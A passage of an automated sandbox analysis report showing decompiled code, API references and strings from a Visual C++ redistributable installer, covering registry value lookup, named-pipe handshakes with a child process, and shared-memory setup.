				_t148 = 1;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v8 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(__ebx + 0x24)) != 0) {
					_t148 = 0x101;
				}
				if(E01288C14(_a4,  *((intOrPtr*)(_t137 + 0x1c)),  &_v16, 0) >= 0) {
					_t80 =  *(_t137 + 0x20);
					__eflags = _t80;
					if(_t80 == 0) {
						L7:
						_t153 = E012B378B( *((intOrPtr*)(_t137 + 0x18)), _v16, _t148,  &_v24);
						__eflags = _t153 - 0x80070002;
						if(_t153 != 0x80070002) {
							__eflags = _t153;
							if(_t153 >= 0) {
								_t85 = RegQueryValueExW(_v24, _v20, 0,  &_v28, 0,  &_v8);
								_t149 = 2;
								__eflags = _t85 - _t149;
								if(_t85 != _t149) {
									__eflags = _t85;
									if(__eflags == 0) {
										_t88 = E012B233B(_v8 + 2, 1);
										_v12 = _t88;
										__eflags = _t88;
										if(_t88 != 0) {
											_t139 =  &_v8;
											_t90 = RegQueryValueExW(_v24, _v20, 0,  &_v28, _t88,  &_v8);
											__eflags = _t90;
											if(__eflags == 0) {
												_t92 = _v28 - 1;
												__eflags = _t92;
												if(_t92 == 0) {
													L52:
													_t94 = E012A0FFE(_t139, _t145,  &_v48, _v12, 0);
													goto L53;
												} else {
													_t108 = _t92 - 1;
													__eflags = _t108;
													if(_t108 == 0) {
														__eflags =  *(_t137 + 0x28);
														if( *(_t137 + 0x28) == 0) {
															goto L52;
														} else {
															_t155 = E012B00D8( &_v48, _v8);
															__eflags = _t155;
															if(_t155 >= 0) {
																_v40 = _t149;
																_t111 = ExpandEnvironmentStringsW(_v12, _v48, _v8);
																_v32 = _t111;
																__eflags = _t111 - _v8;
																if(_t111 <= _v8) {
																	goto L54;
																} else {
																	_t156 = E012B00D8( &_v48, _t111);
																	__eflags = _t156;
																	if(_t156 < 0) {
																		goto L43;
																	} else {
																		_t114 = ExpandEnvironmentStringsW(_v12, _v48, _v32);
																		__eflags = _v32 - _t114;
																		if(_v32 == _t114) {
																			goto L54;
																		} else {
																			_t115 = GetLastError();
																			__eflags = _t115;
																			if(_t115 > 0) {
																				_t115 = _t115 & 0x0000ffff | 0x80070000;
																				__eflags = _t115;
																			}
																			_t156 = _t115;
																			__eflags = _t156;
																			if(_t156 >= 0) {
																				_t156 = 0x80004005;
																			}
																			E012B294E(_t115, "search.cpp", 0x390, _t156);
																			_push("Failed to get expand environment string.");
																			goto L60;
																		}
																	}
																}
															} else {
																L43:
																_push("Failed to allocate string buffer.");
																goto L60;
															}
														}
													} else {
														_t118 = _t108 - _t149;
														__eflags = _t118;
														if(_t118 == 0) {
															__eflags = _v8 - 4;
															if(_v8 != 4) {
																goto L36;
															} else {
																asm("cdq");
																_push(_t145);
																_push( *_v12);
																goto L38;
															}
														} else {
															__eflags = _t118 == 7;
															if(_t118 == 7) {
																__eflags = _v8 - 8;
																if(_v8 == 8) {
																	_t123 = _v12;
																	_push( *((intOrPtr*)(_t123 + 4)));
																	_push( *_t123);
																	L38:
																	_push( &_v48);
																	_t94 = E012A0FC2();
																	L53:
																	_t155 = _t94;
																	L54:
																	__eflags = _t155;
																	if(_t155 >= 0) {
																		_t156 = E012A10FF( &_v48,  *((intOrPtr*)(_t137 + 0x14)));
																		__eflags = _t156;
																		if(_t156 >= 0) {
																			_t156 = E0128A7B0(_a4,  *((intOrPtr*)(_t137 + 4)),  &_v48, 0);
																			__eflags = _t156;
																			if(_t156 < 0) {
																				_push("Failed to set variable.");
																				goto L60;
																			}
																		} else {
																			_push("Failed to change value type.");
																			goto L60;
																		}
																	} else {
																		_push("Failed to read registry value.");
																		goto L60;
																	}
																} else {
																	L36:
																	_t156 = 0x8000ffff;
																	goto L61;
																}
															} else {
																_t156 = 0x80004001;
																E012AFA86(0x80004001, "Unsupported registry key value type. Type = \'%u\'", _v28);
																_t157 = _t157 + 0xc;
																goto L61;
															}
														}
													}
												}
											} else {
												if(__eflags > 0) {
													_t90 = _t90 & 0x0000ffff | 0x80070000;
													__eflags = _t90;
												}
												_t156 = _t90;
												__eflags = _t156;
												if(_t156 >= 0) {
													_t156 = 0x80004005;
												}
												E012B294E(_t90, "search.cpp", 0x36f, _t156);
												_push("Failed to query registry key value.");
												goto L60;
											}
										} else {
											_t156 = 0x8007000e;
											E012B294E(_t88, "search.cpp", 0x36c, 0x8007000e);
											_push("Failed to allocate memory registry value.");
											_push(0x8007000e);
											E012AFA86();
											goto L61;
										}
									} else {
										if(__eflags > 0) {
											_t85 = _t85 & 0x0000ffff | 0x80070000;
											__eflags = _t85;
										}
										_t156 = _t85;
										__eflags = _t156;
										if(_t156 >= 0) {
											_t156 = 0x80004005;
										}
										E012B294E(_t85, "search.cpp", 0x369, _t156);
										_push("Failed to query registry key value size.");
										goto L60;
									}
								} else {
									_push(_v20);
									E012AF6A2(_t149, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v16);
									_t157 = _t157 + 0x10;
									_push(0);
									_push( &_v48);
									_push( *((intOrPtr*)(_t137 + 4)));
									goto L9;
								}
							} else {
								_push("Failed to open registry key.");
								goto L60;
							}
						} else {
							_push( *((intOrPtr*)(_t137 + 4)));
							E012AF6A2(2, "Registry key not found. Key = \'%ls\'; variable = \'%ls\'", _v16);
							_t157 = _t157 + 0x10;
							_push(0);
							_push( &_v48);
							_push( *((intOrPtr*)(_t137 + 4)));
							L9:
							_push(_a4);
							_t156 = E0128A7B0();
							__eflags = _t156;
							if(_t156 >= 0) {
								_t156 = 0;
							} else {
								_push("Failed to clear variable.");
								goto L60;
							}
						}
					} else {
						_t156 = E01288C14(_a4, _t80,  &_v20, 0);
						__eflags = _t156;
						if(_t156 >= 0) {
							goto L7;
						} else {
							_push("Failed to format value string.");
							goto L60;
						}
					}
				} else {
					_push("Failed to format key string.");
					L60:
					_push(_t156);
					E012AFA86();
					if(_t156 < 0) {
						L61:
						_push(_t156);
						E012AF6A2(2, "RegistrySearchValue failed: ID \'%ls\', HRESULT 0x%x", _v16);
					}
				}
				if(_v16 != 0) {
					E012B01E8(_v16);
				}
				if(_v20 != 0) {
					E012B01E8(_v20);
				}
				if(_v24 != 0) {
					RegCloseKey(_v24);
					_v24 = 0;
				}
				if(_v12 != 0) {
					E012B24F6(_v12);
				}
				E012A0E72( &_v48);
				return _t156;
			}

0x0128799f
0x0128799f
0x012879ac
0x012879ad
0x012879ae
0x012879b1
0x012879b4
0x012879b5
0x012879b8
0x012879bb
0x012879be
0x012879c1
0x012879c4
0x012879ca
0x012879cc
0x012879cc
0x012879e5
0x012879f1
0x012879f4
0x012879f6
0x01287a17
0x01287a27
0x01287a29
0x01287a2f
0x01287a6e
0x01287a70
0x01287a94
0x01287a98
0x01287a99
0x01287a9b
0x01287abc
0x01287abe
0x01287afa
0x01287aff
0x01287b02
0x01287b04
0x01287b2d
0x01287b3e
0x01287b40
0x01287b42
0x01287b78
0x01287b78
0x01287b79
0x01287c74
0x01287c7d
0x00000000
0x01287b7f
0x01287b7f
0x01287b7f
0x01287b80
0x01287bdc
0x01287be0
0x00000000
0x01287be6
0x01287bf2
0x01287bf4
0x01287bf6
0x01287c05
0x01287c14
0x01287c16
0x01287c19
0x01287c1c
0x00000000
0x01287c1e
0x01287c28
0x01287c2a
0x01287c2c
0x00000000
0x01287c2e
0x01287c37
0x01287c39
0x01287c3c
0x00000000
0x01287c3e
0x01287c3e
0x01287c44
0x01287c46
0x01287c4d
0x01287c4d
0x01287c4d
0x01287c52
0x01287c54
0x01287c56
0x01287c58
0x01287c58
0x01287c68
0x01287c6d
0x00000000
0x01287c6d
0x01287c3c
0x01287c2c
0x01287bf8
0x01287bf8
0x01287bf8
0x00000000
0x01287bf8
0x01287bf6
0x01287b82
0x01287b82
0x01287b82
0x01287b84
0x01287bcc
0x01287bd0
0x00000000
0x01287bd2
0x01287bd7
0x01287bd8
0x01287bd9
0x00000000
0x01287bd9
0x01287b86
0x01287b86
0x01287b89
0x01287ba6
0x01287baa
0x01287bb6
0x01287bb9
0x01287bbc
0x01287bbe
0x01287bc1
0x01287bc2
0x01287c82
0x01287c82
0x01287c84
0x01287c84
0x01287c86
0x01287c9b
0x01287c9d
0x01287c9f
0x01287cb9
0x01287cbb
0x01287cbd
0x01287cbf
0x00000000
0x01287cbf
0x01287ca1
0x01287ca1
0x00000000
0x01287ca1
0x01287c88
0x01287c88
0x00000000
0x01287c88
0x01287bac
0x01287bac
0x01287bac
0x00000000
0x01287bac
0x01287b8b
0x01287b8e
0x01287b99
0x01287b9e
0x00000000
0x01287b9e
0x01287b89
0x01287b84
0x01287b80
0x01287b44
0x01287b44
0x01287b4b
0x01287b4b
0x01287b4b
0x01287b50
0x01287b52
0x01287b54
0x01287b56
0x01287b56
0x01287b66
0x01287b6b
0x00000000
0x01287b6b
0x01287b06
0x01287b06
0x01287b16
0x01287b1b
0x01287b20
0x01287b21
0x00000000
0x01287b27
0x01287ac0
0x01287ac0
0x01287ac7
0x01287ac7
0x01287ac7
0x01287acc
0x01287ace
0x01287ad0
0x01287ad2
0x01287ad2
0x01287ae2
0x01287ae7
0x00000000
0x01287ae7
0x01287a9d
0x01287a9d
0x01287aa9
0x01287aae
0x01287ab1
0x01287ab6
0x01287ab7
0x00000000
0x01287ab7
0x01287a72
0x01287a72
0x00000000
0x01287a72
0x01287a31
0x01287a31
0x01287a3e
0x01287a43
0x01287a46
0x01287a4b
0x01287a4c
0x01287a4f
0x01287a4f
0x01287a57
0x01287a59
0x01287a5b
0x01287a67
0x01287a5d
0x01287a5d
0x00000000
0x01287a5d
0x01287a5b
0x012879f8
0x01287a07
0x01287a09
0x01287a0b
0x00000000
0x01287a0d
0x01287a0d
0x00000000
0x01287a0d
0x01287a0b
0x012879e7
0x012879e7
0x01287cc4
0x01287cc4
0x01287cc5
0x01287cce
0x01287cd0
0x01287cd0
0x01287cdb
0x01287ce0
0x01287cce
0x01287ce8
0x01287ced
0x01287ced
0x01287cf5
0x01287cfa
0x01287cfa
0x01287d02
0x01287d07
0x01287d0d
0x01287d0d
0x01287d13
0x01287d18
0x01287d18
0x01287d21
0x01287d2b

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 012879DC
_MREFOpen@16.MSPDB140-MSVCRT ref: 01287A02
RegCloseKey.ADVAPI32(01288B40,?,00000000,?,00000000,?,?,?,?,00000000), ref: 01287D07

Strings

Unsupported registry key value type. Type = '%u', xrefs: 01287B93
Failed to allocate string buffer., xrefs: 01287BF8
Failed to set variable., xrefs: 01287CBF
Failed to open registry key., xrefs: 01287A72
Registry key not found. Key = '%ls'; variable = '%ls', xrefs: 01287A37
Failed to format key string., xrefs: 012879E7
Failed to change value type., xrefs: 01287CA1
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 01287AA3
Failed to query registry key value size., xrefs: 01287AE7
Failed to read registry value., xrefs: 01287C88
Failed to clear variable., xrefs: 01287A5D
Failed to get expand environment string., xrefs: 01287C6D
search.cpp, xrefs: 01287ADD, 01287B11, 01287B61, 01287C63
Failed to format value string., xrefs: 01287A0D
Failed to query registry key value., xrefs: 01287B6B
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 01287CD4
Failed to allocate memory registry value., xrefs: 01287B1B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'; variable = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-822975546
Opcode ID: 4180d73d09515dcb6a7c661cc228a31b8e9e9562330cc729421cc022c7e250ca
Instruction ID: 5af5158a96a3784eb8606425f0b073cec822ca27e9dae8013081f9ac3f916bf1
Opcode Fuzzy Hash: 4180d73d09515dcb6a7c661cc228a31b8e9e9562330cc729421cc022c7e250ca
Instruction Fuzzy Hash: 72A11832D7221BFBEF12BA98CD41EFEBE75AF04750F254165EA00B7290D675DA0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 01282BBB Relevance: 44.0, APIs: 17, Strings: 8, Instructions: 232
filepipesleepCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E01282BBB(signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				void _v20;
				void* _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t62;
				WCHAR* _t63;
				void* _t68;
				signed int _t71;
				signed int _t82;
				signed int _t89;
				signed int _t95;
				signed int _t102;
				signed int _t109;
				signed int _t120;
				void* _t121;

				_t62 = _a4;
				_t2 = _t62 + 0x10; // 0x8b55c300
				_v40 =  *_t2;
				_t4 = _t62 + 0x14; // 0xcec83ec
				_t5 = _t62 + 4; // 0xcadce856
				_t63 =  *_t5;
				_t120 = 0;
				_v36 =  *_t4;
				_v24 = _t63;
				_v20 = lstrlenW(_t63) + _t64;
				_v28 = GetCurrentProcessId();
				_v32 = 0;
				_v8 = 0;
				_a4 = 0;
				while(1) {
					L1:
					_t68 =  *(_t121 + _a4 * 4 - 0x24);
					if(_t68 == 0xffffffff) {
						break;
					}
					_v16 = 1;
					if(SetNamedPipeHandleState(_t68,  &_v16, 0, 0) == 0) {
						_t71 = GetLastError();
						if(_t71 > 0) {
							_t71 = _t71 & 0x0000ffff | 0x80070000;
						}
						_t120 = _t71;
						if(_t120 >= 0) {
							_t120 = 0x80004005;
						}
						E012B294E(_t71, "pipe.cpp", 0x1e7, _t120);
						_push("Failed to set pipe to non-blocking.");
						goto L55;
					} else {
						_v12 = _v12 & 0x00000000;
						do {
							if(ConnectNamedPipe( *(_t121 + _a4 * 4 - 0x24), 0) != 0) {
								goto L9;
							} else {
								_t76 = GetLastError();
								if(_t76 == 0x217) {
									_t120 = 0;
									goto L16;
								} else {
									if(_t76 != 0x218) {
										if(_t76 > 0) {
											_t76 = _t76 & 0x0000ffff | 0x80070000;
										}
										_t120 = _t76;
										L15:
										if(_t120 < 0) {
											goto L24;
										} else {
											L16:
											_v16 = 0;
											if(SetNamedPipeHandleState( *(_t121 + _a4 * 4 - 0x24),  &_v16, 0, 0) == 0) {
												_t82 = GetLastError();
												if(_t82 > 0) {
													_t82 = _t82 & 0x0000ffff | 0x80070000;
												}
												_t120 = _t82;
												if(_t120 >= 0) {
													_t120 = 0x80004005;
												}
												E012B294E(_t82, "pipe.cpp", 0x212, _t120);
												_push("Failed to reset pipe to blocking.");
												goto L55;
											} else {
												if(WriteFile( *(_t121 + _a4 * 4 - 0x24),  &_v20, 4,  &_v8, 0) == 0) {
													_t89 = GetLastError();
													if(_t89 > 0) {
														_t89 = _t89 & 0x0000ffff | 0x80070000;
													}
													_t120 = _t89;
													if(_t120 >= 0) {
														_t120 = 0x80004005;
													}
													E012B294E(_t89, "pipe.cpp", 0x218, _t120);
													_push("Failed to write secret length to pipe.");
													goto L55;
												} else {
													if(WriteFile( *(_t121 + _a4 * 4 - 0x24), _v24, _v20,  &_v8, 0) == 0) {
														_t95 = GetLastError();
														if(_t95 > 0) {
															_t95 = _t95 & 0x0000ffff | 0x80070000;
														}
														_t120 = _t95;
														if(_t120 >= 0) {
															_t120 = 0x80004005;
														}
														E012B294E(_t95, "pipe.cpp", 0x21d, _t120);
														_push("Failed to write secret to pipe.");
														goto L55;
													} else {
														if(WriteFile( *(_t121 + _a4 * 4 - 0x24),  &_v28, 4,  &_v8, 0) == 0) {
															_t102 = GetLastError();
															if(_t102 > 0) {
																_t102 = _t102 & 0x0000ffff | 0x80070000;
															}
															_t120 = _t102;
															if(_t120 >= 0) {
																_t120 = 0x80004005;
															}
															E012B294E(_t102, "pipe.cpp", 0x222, _t120);
															_push("Failed to write our process id to pipe.");
															goto L55;
														} else {
															if(ReadFile( *(_t121 + _a4 * 4 - 0x24),  &_v32, 4,  &_v8, 0) == 0) {
																_t109 = GetLastError();
																if(_t109 > 0) {
																	_t109 = _t109 & 0x0000ffff | 0x80070000;
																}
																_t120 = _t109;
																if(_t120 >= 0) {
																	_t120 = 0x80004005;
																}
																E012B294E(_t109, "pipe.cpp", 0x228, _t120);
																_push("Failed to read ACK from pipe.");
																goto L55;
															} else {
																_a4 = _a4 + 1;
																if(_a4 < 2) {
																	goto L1;
																} else {
																}
															}
														}
													}
												}
											}
										}
									} else {
										if(_v12 >= 0x708) {
											_t120 = 0x800705b4;
											L24:
											E012B294E(_t76, "pipe.cpp", 0x20c, _t120);
											_push("Failed to wait for child to connect to pipe.");
											L55:
											_push(_t120);
											E012AFA86();
										} else {
											_v12 = _v12 + 1;
											_t120 = 0x80070218;
											Sleep(0x64);
											goto L9;
										}
									}
								}
							}
							goto L56;
							L9:
						} while (_t120 == 0x80070218);
						goto L15;
					}
					break;
				}
				L56:
				return _t120;
			}

0x01282bc1
0x01282bc4
0x01282bc9
0x01282bcc
0x01282bcf
0x01282bcf
0x01282bd4
0x01282bd6
0x01282bd9
0x01282be4
0x01282bed
0x01282bf0
0x01282bf3
0x01282bf6
0x01282c03
0x01282c03
0x01282c06
0x01282c0d
0x00000000
0x00000000
0x01282c1c
0x01282c2b
0x01282d6e
0x01282d76
0x01282d7a
0x01282d7a
0x01282d7c
0x01282d80
0x01282d82
0x01282d82
0x01282d92
0x01282d97
0x00000000
0x01282c31
0x01282c31
0x01282c35
0x01282c46
0x00000000
0x01282c48
0x01282c48
0x01282c53
0x01282c83
0x00000000
0x01282c55
0x01282c5a
0x01282c89
0x01282c8d
0x01282c8d
0x01282c8f
0x01282c91
0x01282c93
0x00000000
0x01282c99
0x01282c99
0x01282c9d
0x01282cb3
0x01282da1
0x01282da9
0x01282dad
0x01282dad
0x01282daf
0x01282db3
0x01282db5
0x01282db5
0x01282dc5
0x01282dca
0x00000000
0x01282cb9
0x01282cd4
0x01282dd4
0x01282ddc
0x01282de0
0x01282de0
0x01282de2
0x01282de6
0x01282de8
0x01282de8
0x01282df8
0x01282dfd
0x00000000
0x01282cda
0x01282cf5
0x01282e07
0x01282e0f
0x01282e13
0x01282e13
0x01282e15
0x01282e19
0x01282e1b
0x01282e1b
0x01282e2b
0x01282e30
0x00000000
0x01282cfb
0x01282d16
0x01282e37
0x01282e3f
0x01282e43
0x01282e43
0x01282e45
0x01282e49
0x01282e4b
0x01282e4b
0x01282e5b
0x01282e60
0x00000000
0x01282d1c
0x01282d37
0x01282e67
0x01282e6f
0x01282e73
0x01282e73
0x01282e75
0x01282e79
0x01282e7b
0x01282e7b
0x01282e8b
0x01282e90
0x00000000
0x01282d3d
0x01282d3d
0x01282d44
0x00000000
0x00000000
0x01282d4a
0x01282d44
0x01282d37
0x01282d16
0x01282cf5
0x01282cd4
0x01282cb3
0x01282c5c
0x01282c63
0x01282d4f
0x01282d54
0x01282d5f
0x01282d64
0x01282e95
0x01282e95
0x01282e96
0x01282c69
0x01282c69
0x01282c6e
0x01282c73
0x00000000
0x01282c73
0x01282c63
0x01282c5a
0x01282c53
0x00000000
0x01282c79
0x01282c79
0x00000000
0x01282c81
0x00000000
0x01282c2b
0x01282e9e
0x01282ea3

APIs

lstrlenW.KERNEL32(CADCE856,00000000,0128130D,80070642,?,0128BD3C,0128130D,?,75BDA770,?,?,0128130D), ref: 01282BDC
GetCurrentProcessId.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?,?,0128130D), ref: 01282BE7
SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282C23
ConnectNamedPipe.KERNEL32(?,00000000,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282C3E
GetLastError.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282C48
Sleep.KERNEL32(00000064,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282C73
SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282CAB
WriteFile.KERNEL32(?,?,00000004,000000FF,00000000,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282CCC
WriteFile.KERNEL32(?,75BDA770,?,000000FF,00000000,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282CED
WriteFile.KERNEL32(?,?,00000004,000000FF,00000000,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282D0E
ReadFile.KERNEL32(?,0128130D,00000004,000000FF,00000000,?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282D2F
GetLastError.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282D6E
GetLastError.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282DA1
GetLastError.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282DD4
GetLastError.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282E07
GetLastError.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282E37
GetLastError.KERNEL32(?,0128BD3C,0128130D,?,75BDA770,?), ref: 01282E67

Strings

Failed to read ACK from pipe., xrefs: 01282E90
Failed to write secret to pipe., xrefs: 01282E30
Failed to write our process id to pipe., xrefs: 01282E60
Failed to reset pipe to blocking., xrefs: 01282DCA
pipe.cpp, xrefs: 01282D5A, 01282D8D, 01282DC0, 01282DF3, 01282E26, 01282E56, 01282E86
Failed to write secret length to pipe., xrefs: 01282DFD
Failed to wait for child to connect to pipe., xrefs: 01282D64
Failed to set pipe to non-blocking., xrefs: 01282D97

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$pipe.cpp
API String ID: 2944378912-2009266399
Opcode ID: 28933dd60c422041d4a6464f1d9f40178fc09cf4cc236d33c6d2a6e74e06be10
Instruction ID: a1b15cfb89ff89c0c1afce0d34d123089b97da68fdac9b8a61216d208a65bbe8
Opcode Fuzzy Hash: 28933dd60c422041d4a6464f1d9f40178fc09cf4cc236d33c6d2a6e74e06be10
Instruction Fuzzy Hash: E271E632A71216FBD720AF99DC89BEE7AE89F18790F144025BA14F71D0D770D900CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012A4A40 Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 232
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E012A4A40(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void*** _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* _t51;
				void* _t53;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t74;
				signed int _t79;
				signed int _t83;
				signed int _t86;
				signed int _t89;
				signed int _t92;
				signed int _t109;
				void** _t112;
				void* _t114;
				void* _t115;

				_v8 = 0;
				_t112 = E012B233B(0x18, 1);
				if(_t112 != 0) {
					_t51 = CreateEventW(0, 0, 0, _a8);
					_t112[1] = _t51;
					if(_t51 != 0) {
						_t53 = E012B177A( &_v8, L"%ls_send", _a8);
						_t115 = _t114 + 0xc;
						if(_t53 >= 0) {
							_t54 = CreateEventW(0, 0, 0, _v8);
							_t112[2] = _t54;
							if(_t54 != 0) {
								_t109 = E012B177A( &_v8, L"%ls_mutex", _a8);
								_t115 = _t115 + 0xc;
								if(_t109 >= 0) {
									_t57 = CreateMutexW(0, 1, _v8);
									_t112[3] = _t57;
									if(_t57 != 0) {
										_t58 = CreateFileMappingW(0xffffffff, 0, 4, 0, 0x10000, _a4);
										 *_t112 = _t58;
										if(_t58 != 0) {
											_t59 = MapViewOfFile(_t58, 2, 0, 0, 0);
											_t112[4] = _t59;
											if(_t59 != 0) {
												_t109 = E0129DF26(_t59 + 0x21a, 0x104, _a8);
												if(_t109 >= 0) {
													 *(_t112[4]) = 0;
													 *((char*)(_t112[4] + 0x218)) = 0;
													 *((intOrPtr*)(_t112[4] + 4)) = 0x8000000a;
													 *((char*)(_t112[4] + 2)) = 0;
													 *((char*)(_t112[4] + 1)) = 0;
													 *((char*)(_t112[4] + 0x219)) = 0;
													 *((intOrPtr*)(_t112[4] + 8)) = 0x8000000a;
													 *((char*)(_t112[4] + 3)) = 0;
													 *((intOrPtr*)(_t112[4] + 0xc)) = 0;
													 *((char*)(_t112[4] + 0x422)) = 1;
													 *((intOrPtr*)(_t112[4] + 0x424)) = 0;
													 *((intOrPtr*)(_t112[4] + 0x428)) = 0;
													 *((intOrPtr*)(_t112[4] + 0x42c)) = 0;
													ReleaseMutex(_t112[3]);
													 *_a12 = _t112;
													_t112 = 0;
												} else {
													_push("failed to copy event name to shared memory structure.");
													goto L40;
												}
											} else {
												_t79 = GetLastError();
												if(_t79 > 0) {
													_t79 = _t79 & 0x0000ffff | 0x80070000;
												}
												_t109 = _t79;
												if(_t109 >= 0) {
													_t109 = 0x80004005;
												}
												E012B294E(_t79, "NetFxChainer.cpp", 0x4d, _t109);
												_push(_a4);
												_push("Failed to MapViewOfFile for %ls.");
												goto L37;
											}
										} else {
											_t83 = GetLastError();
											if(_t83 > 0) {
												_t83 = _t83 & 0x0000ffff | 0x80070000;
											}
											_t109 = _t83;
											if(_t109 >= 0) {
												_t109 = 0x80004005;
											}
											E012B294E(_t83, "NetFxChainer.cpp", 0x46, _t109);
											_push(_a4);
											_push("Failed to memory map cabinet file: %ls");
											goto L37;
										}
									} else {
										_t86 = GetLastError();
										if(_t86 > 0) {
											_t86 = _t86 & 0x0000ffff | 0x80070000;
										}
										_t109 = _t86;
										if(_t109 >= 0) {
											_t109 = 0x80004005;
										}
										E012B294E(_t86, "NetFxChainer.cpp", 0x3e, _t109);
										_push(_v8);
										_push("Failed to create mutex: %ls");
										goto L37;
									}
								} else {
									_push("failed to allocate memory for mutex name");
									goto L40;
								}
							} else {
								_t89 = GetLastError();
								if(_t89 > 0) {
									_t89 = _t89 & 0x0000ffff | 0x80070000;
								}
								_t109 = _t89;
								if(_t109 >= 0) {
									_t109 = 0x80004005;
								}
								E012B294E(_t89, "NetFxChainer.cpp", 0x37, _t109);
								_push(_v8);
								goto L16;
							}
						} else {
							_push("failed to allocate memory for event name");
							L40:
							_push(_t109);
							goto L41;
						}
					} else {
						_t92 = GetLastError();
						if(_t92 > 0) {
							_t92 = _t92 & 0x0000ffff | 0x80070000;
						}
						_t109 = _t92;
						if(_t109 >= 0) {
							_t109 = 0x80004005;
						}
						E012B294E(_t92, "NetFxChainer.cpp", 0x31, _t109);
						_push(_a8);
						L16:
						_push("Failed to create event: %ls");
						L37:
						_push(_t109);
						E012AFA86();
					}
				} else {
					_t109 = 0x8007000e;
					E012B294E(_t50, "NetFxChainer.cpp", 0x2e, 0x8007000e);
					_push("Failed to allocate memory for NetFxChainer struct.");
					_push(0x8007000e);
					L41:
					E012AFA86();
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				if(_t112 != 0) {
					_t74 = _t112[3];
					if(_t74 != 0) {
						ReleaseMutex(_t74);
					}
					E012A4762(_t109, _t112);
				}
				return _t109;
			}

0x012a4a4d
0x012a4a55
0x012a4a59
0x012a4a7e
0x012a4a84
0x012a4a89
0x012a4ac8
0x012a4acf
0x012a4ad4
0x012a4ae6
0x012a4aec
0x012a4af1
0x012a4b3d
0x012a4b3f
0x012a4b44
0x012a4b56
0x012a4b5c
0x012a4b61
0x012a4baa
0x012a4bb0
0x012a4bb4
0x012a4bf2
0x012a4bf8
0x012a4bfd
0x012a4c54
0x012a4c58
0x012a4c6c
0x012a4c71
0x012a4c7f
0x012a4c85
0x012a4c8b
0x012a4c91
0x012a4c9a
0x012a4ca0
0x012a4ca6
0x012a4cac
0x012a4cb6
0x012a4cbf
0x012a4cc8
0x012a4cd1
0x012a4cda
0x012a4cdc
0x012a4c5a
0x012a4c5a
0x00000000
0x012a4c5a
0x012a4bff
0x012a4bff
0x012a4c07
0x012a4c0e
0x012a4c0e
0x012a4c13
0x012a4c17
0x012a4c19
0x012a4c19
0x012a4c26
0x012a4c2b
0x012a4c2e
0x00000000
0x012a4c2e
0x012a4bb6
0x012a4bb6
0x012a4bbe
0x012a4bc5
0x012a4bc5
0x012a4bca
0x012a4bce
0x012a4bd0
0x012a4bd0
